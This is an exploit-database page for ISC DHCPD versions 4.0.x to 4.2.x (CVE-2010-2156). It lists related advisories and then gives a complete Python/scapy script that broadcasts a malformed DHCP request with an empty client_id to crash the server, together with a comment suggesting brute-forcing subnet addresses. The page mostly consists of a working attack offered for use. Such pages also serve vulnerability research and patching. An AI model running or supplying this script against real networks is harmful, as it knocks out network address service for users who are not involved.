ISC DHCPD - Denial of Service

🗓️ 03 Jul 2010 00:00:00Reported by sidType

ISC DHCPD Denial of Service exploit, version 4.0.x - 4.2.x, CVE-2010-215

Reporter	Title	Published	Views	Family All 44
0day.today	ISC-DHCPD Denial of Service	3 Jul 201000:00	–	zdt
Circl	CVE-2010-2156	29 May 201815:50	–	circl
Check Point Advisories	ISC DHCP Server Denial of Service And Buffer Overflow (CVE-2004-0460; CVE-2006-3122; CVE-2010-2156)	1 Aug 201000:00	–	checkpoint_advisories
CVE	CVE-2010-2156	7 Jun 201013:38	–	cve
Cvelist	CVE-2010-2156	7 Jun 201013:38	–	cvelist
Debian CVE	CVE-2010-2156	7 Jun 201013:38	–	debiancve
exploitpack	ISC DHCPD - Denial of Service	3 Jul 201000:00	–	exploitpack
Fedora	[SECURITY] Fedora 12 Update: dhcp-4.1.1-17.P1.fc12	24 Jun 201016:27	–	fedora
Fedora	[SECURITY] Fedora 11 Update: dhcp-4.1.0p1-6.fc11	24 Jun 201016:20	–	fedora
Fedora	[SECURITY] Fedora 13 Update: dhcp-4.1.1-22.P1.fc13	15 Jun 201015:57	–	fedora

#!/usr/bin/env python
# Exploit title: isc-dhcpd DoS
# Date: 03/07/2010	
# Author: sid
# Software Link: https://www.isc.org/software/dhcp
# Version:  4.0.x, 4.1.x, 4.2.x 
# CVE: cve-2010-2156
# ps: is possible make a bruteforce on subnet ip address to find a correct value. 
# 


import sys
import string

if len(sys.argv) is 1:
	print("Usage: " + sys.argv[0] + "-ip=<legal ip in subnet>")
	print("Example: " + sys.argv[0] + " -ip=192.168.1.100")
	sys.exit(0)

for i in range(len(sys.argv)):
	if string.find(sys.argv[i],"-ip") is 0:
		globals()['ip'] = sys.argv[i].split('=')[1]

from scapy.all import *

globals()['verbose'] = 2

def msg(string, level):
    if globals()['verbose'] >= level:
        print(string)

msg("attack...",2)
p=(Ether(src="aa:aa:aa:aa:aa:aa",dst="ff:ff:ff:ff:ff:ff")/IP(dst="255.255.255.255")/UDP(sport=68,dport=67)/
BOOTP(ciaddr=globals()['ip'],chaddr="\xaa\xaa\xaa\xaa\xaa\xaa")/
DHCP(options=[("message-type","request"),("client_id",""),("end")]))

if p:
	p.show()
sendp(p)

#EOF

03 Jul 2010 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 25

EPSS0.8675